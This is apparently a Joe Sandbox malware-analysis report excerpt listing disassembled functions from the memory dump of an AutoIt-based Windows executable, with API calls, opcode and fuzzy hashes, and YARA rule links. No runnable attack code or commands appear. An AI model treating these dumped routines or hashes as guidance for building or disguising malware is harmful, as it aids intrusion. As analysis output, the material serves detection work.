                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer$Kill
                                                        • String ID:
                                                        • API String ID: 3500052701-0
                                                        • Opcode ID: 438e6d1c26eb22b82b312415be961d5bd6ba376a72a99aa7a31aff86529a1bca
                                                        • Instruction ID: 0c584c26dbbb0f6843e72b0d70ca5b4fb676fe0a4e1d8bbe38f920e4857ce495
                                                        • Opcode Fuzzy Hash: 438e6d1c26eb22b82b312415be961d5bd6ba376a72a99aa7a31aff86529a1bca
                                                        • Instruction Fuzzy Hash: 7031F6749047446FEB228B648855BE6BBEC9B03308F10149EDA9EB7151D3745A88CB51
                                                        Function 00E286AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(00000000,00000000,?,?,00E285CC,?,00EB8CC8,0000000C), ref: 00E28704
                                                        • GetLastError.KERNEL32(?,00E285CC,?,00EB8CC8,0000000C), ref: 00E2870E
                                                        • __dosmaperr.LIBCMT ref: 00E28739
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                        • String ID:
                                                        • API String ID: 2583163307-0
                                                        • Opcode ID: 34e932227c150d06e549a9505925e95f117414117746e6b65e501691007af911
                                                        • Instruction ID: d9c26f8da1b50da719d34e600db95c003fbec1deb92eadce330ce9bf20776d43
                                                        • Opcode Fuzzy Hash: 34e932227c150d06e549a9505925e95f117414117746e6b65e501691007af911
                                                        • Instruction Fuzzy Hash: 54016F336061701AD220A2347B45B7E27854B8277CF383129F814FB1D3DEB18C818190
                                                        Function 00DFDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • TranslateMessage.USER32(?), ref: 00DFDB7B
                                                        • DispatchMessageW.USER32(?), ref: 00DFDB89
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DFDB9F
                                                        • Sleep.KERNELBASE(0000000A), ref: 00DFDBB1
                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00E41CC9
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                        • String ID:
                                                        • API String ID: 3288985973-0
                                                        • Opcode ID: 7975a1ca085266868ce9039266b0f7c7c0e9838982b47ffeffc0e221675dd459
                                                        • Instruction ID: d1edbe4168b8ed33434dd69e3be5297e9132d40328fd2e65c0af0c98e905915e
                                                        • Opcode Fuzzy Hash: 7975a1ca085266868ce9039266b0f7c7c0e9838982b47ffeffc0e221675dd459
                                                        • Instruction Fuzzy Hash: 69F054316043449BEB34CB719C85FEA73B9EB46350F104559E649A30D0DB309489CB25
                                                        Function 00E01310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 00E017F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Init_thread_footer
                                                        • String ID: CALL
                                                        • API String ID: 1385522511-4196123274
                                                        • Opcode ID: 393c7707a4dde64e6d26e88da7bd153061cdcecbcb586f567cc168064fff36d7
                                                        • Instruction ID: 34cfd821c1d634d1308c24faeff13742d9e5bf4869d71ddd9ff4047507f0f0d4
                                                        • Opcode Fuzzy Hash: 393c7707a4dde64e6d26e88da7bd153061cdcecbcb586f567cc168064fff36d7
                                                        • Instruction Fuzzy Hash: 7D22AD706083419FC714CF14D880B6ABBF1BF86314F14999DF496AB3A1D772E985CB92
                                                        Function 00DF3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DF3908
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_
                                                        • String ID:
                                                        • API String ID: 1144537725-0
                                                        • Opcode ID: 9ef3af0cfa746307c4799277f186d2a333bddd0c3fc0c195004c277db922fd6f
                                                        • Instruction ID: abdd1b641596501e9eec01e8da9c5febdf75dc429f402971f376763070b35573
                                                        • Opcode Fuzzy Hash: 9ef3af0cfa746307c4799277f186d2a333bddd0c3fc0c195004c277db922fd6f
                                                        • Instruction Fuzzy Hash: 4731E3705043049FD720DF25D884BABBBF4FB49348F01096EFA9993241E775AA48CB62
                                                        Function 00E0F645 Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00E0F661
                                                          • Part of subcall function 00DFD730: GetInputState.USER32 ref: 00DFD807
                                                        • Sleep.KERNEL32(00000000), ref: 00E4F2DE
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: InputSleepStateTimetime
                                                        • String ID:
                                                        • API String ID: 4149333218-0
                                                        • Opcode ID: 53dbf26dfac3123624404c42c63fcbe7e86d585e9175715aa0e0755f4f817a4b
                                                        • Instruction ID: 5f2e4841fdcd81d95dd98ff3fe61a7561081f0b885d8e0bf2c953dac8ccbcaf5
                                                        • Opcode Fuzzy Hash: 53dbf26dfac3123624404c42c63fcbe7e86d585e9175715aa0e0755f4f817a4b
                                                        • Instruction Fuzzy Hash: D1F08C312402099FD310EF79E459B6AB7E9EF46760F00402AE95ED73A0DB70A840CBB1
                                                        Function 00DF4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DF4EDD,?,00EC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DF4E9C
                                                          • Part of subcall function 00DF4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DF4EAE
                                                          • Part of subcall function 00DF4E90: FreeLibrary.KERNEL32(00000000,?,?,00DF4EDD,?,00EC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DF4EC0
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00EC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DF4EFD
                                                          • Part of subcall function 00DF4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E33CDE,?,00EC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DF4E62
                                                          • Part of subcall function 00DF4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DF4E74
                                                          • Part of subcall function 00DF4E59: FreeLibrary.KERNEL32(00000000,?,?,00E33CDE,?,00EC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DF4E87
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressFreeProc
                                                        • String ID:
                                                        • API String ID: 2632591731-0
                                                        • Opcode ID: ba1b16c4d96cd71b4a4935b24e878b360cc724b99e52de2c9ba0547460bd30ff
                                                        • Instruction ID: 8d6d623d23bd83beb8472fcb741d29a0e61c9b4b84a775a074a67aa1757b2df0
                                                        • Opcode Fuzzy Hash: ba1b16c4d96cd71b4a4935b24e878b360cc724b99e52de2c9ba0547460bd30ff
                                                        • Instruction Fuzzy Hash: C211C132610209AACB14AB60DC16FBE77A5EF40710F21C42DF64AB61D5EE709A459770
                                                        Function 00E28402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: __wsopen_s
                                                        • String ID:
                                                        • API String ID: 3347428461-0
                                                        • Opcode ID: e0e1f2d839a1b50bd26be1499363f77082f71f3501e6cab5336d00d953161b78
                                                        • Instruction ID: 89e0e5cfa1598bb227a5c5c5e5823a6960c1df68fdbb5d47d0dc476bca8a80eb
                                                        • Opcode Fuzzy Hash: e0e1f2d839a1b50bd26be1499363f77082f71f3501e6cab5336d00d953161b78
                                                        • Instruction Fuzzy Hash: B211187590410AAFCB05DF58E94199E7BF5EF48314F144069F819AB312DA31DA21CBA5
                                                        Function 00E1E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                        • Instruction ID: c6b44acba13c971a18d7066853dc85ea0cf1919b7c0c9c4a2a10322c7b80d54a
                                                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                        • Instruction Fuzzy Hash: BCF02872511A24AAD7313A69AC05FDA33D89F92334F102719FD22B33D2CB70E88186A5
                                                        Function 00E8150E Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E81579
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 0b3cf1c47aec9e6fb5154ba695c70cb98fe7a4f4da1d552c1e97cbd6af9e4cee
                                                        • Instruction ID: a4dacad2169bec9bf7c7bee0b73a0320570f02581a830431c326c349e2fb93fd
                                                        • Opcode Fuzzy Hash: 0b3cf1c47aec9e6fb5154ba695c70cb98fe7a4f4da1d552c1e97cbd6af9e4cee
                                                        • Instruction Fuzzy Hash: 03019E35200601AFD324EB28C415BA6BBA5EF45318F14948CE95F6F292CB72FD82CBC0
                                                        Function 00E23820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,?,00EC1444,?,00E0FDF5,?,?,00DFA976,00000010,00EC1440,00DF13FC,?,00DF13C6,?,00DF1129), ref: 00E23852
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 72d4132643591455c8cf037f6272b042c329e80ee047a8050217ea508a4deb6b
                                                        • Instruction ID: 44e1ab51e60765aba5af628e0cbb630044dc16d11b2fcfb872b3678f88b39230
                                                        • Opcode Fuzzy Hash: 72d4132643591455c8cf037f6272b042c329e80ee047a8050217ea508a4deb6b
                                                        • Instruction Fuzzy Hash: 8FE0E5322012345AD62D2677BC04BDA37D9AB42BB4F262220BD15BE5D1CB29DD428AE0
                                                        Function 00DF4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,00EC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DF4F6D
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: f8801cbb6fa38bf0b7cc97dfc49156bd7561cd501b1b1ed5647afdf5d1f28205
                                                        • Instruction ID: 0d51b0ec0b61ff3cf1076bcf3413ea620188a07ae8ce2e0b6f7dfc450c958f6a
                                                        • Opcode Fuzzy Hash: f8801cbb6fa38bf0b7cc97dfc49156bd7561cd501b1b1ed5647afdf5d1f28205
                                                        • Instruction Fuzzy Hash: 25F03971509756CFDB349F64D494823BBF4AF14329325C97EE2EE82621CB319888DF20
                                                        Function 00E82A55 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 00E82A66
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window
                                                        • String ID:
                                                        • API String ID: 2353593579-0
                                                        • Opcode ID: 0c7cbf04b6aff21c4194e2b0d6add32c81b0037bf1cbdcefcc44604702a5d0af
                                                        • Instruction ID: 8effb2bec07fecce7ac5e86ed1452db7d4be46cd98b28a2c2061ddddc9052dc4
                                                        • Opcode Fuzzy Hash: 0c7cbf04b6aff21c4194e2b0d6add32c81b0037bf1cbdcefcc44604702a5d0af
                                                        • Instruction Fuzzy Hash: F4E04F76350116AAC718FA30EC808FA739CEF503D5710557AAD2EE2140EB309A9997A0
                                                        Function 00DF2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DF2DC4
                                                          • Part of subcall function 00DF6B57: _wcslen.LIBCMT ref: 00DF6B6A
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath_wcslen
                                                        • String ID:
                                                        • API String ID: 541455249-0
                                                        • Opcode ID: 11f2210a528eeb2db1bfe5ce2d1a8f999be13645641f3ad1b27cab23731428b2
                                                        • Instruction ID: 7e45b6e05ed8cabe375ce6b7e17490087bf0842758424c702c07127adaaa90ea
                                                        • Opcode Fuzzy Hash: 11f2210a528eeb2db1bfe5ce2d1a8f999be13645641f3ad1b27cab23731428b2
                                                        • Instruction Fuzzy Hash: D1E0CD726001245BC71092589C05FEA77EDDFC8790F0540B5FD09E7258D970ED84C660
                                                        Function 00DF2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DF3908
                                                          • Part of subcall function 00DFD730: GetInputState.USER32 ref: 00DFD807
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00DF2B6B
                                                          • Part of subcall function 00DF30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00DF314E
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                        • String ID:
                                                        • API String ID: 3667716007-0
                                                        • Opcode ID: dae9bfac8c559280d7808a6feac97113bf6359925c74231a5f5bfc7f62d47f6a
                                                        • Instruction ID: 169f538446743dc025dc86a038d2a3d4a7e8a001d3a139a555773fa0c1511345
                                                        • Opcode Fuzzy Hash: dae9bfac8c559280d7808a6feac97113bf6359925c74231a5f5bfc7f62d47f6a
                                                        • Instruction Fuzzy Hash: 1CE0263130024C06C608BB31981297DB34ADBD2352F43947EF35253263CE25894A4331
                                                        Function 00E3039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00E30704,?,?,00000000,?,00E30704,00000000,0000000C), ref: 00E303B7
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: f8c4d35f495ba18dbda28a2c6e5a3eb085ae923762cd88a78bad74704d096725
                                                        • Instruction ID: 951b25d7da9f7a9ede3382a15902179a5ebb81eadbdc6190f6a04a684b36eb5e
                                                        • Opcode Fuzzy Hash: f8c4d35f495ba18dbda28a2c6e5a3eb085ae923762cd88a78bad74704d096725
                                                        • Instruction Fuzzy Hash: F5D06C3204010DBFDF028F85DD46EDA3BAAFB48714F114000BE5866020C732E821AB90
                                                        Function 00DF1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00DF1CBC
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem
                                                        • String ID:
                                                        • API String ID: 3098949447-0
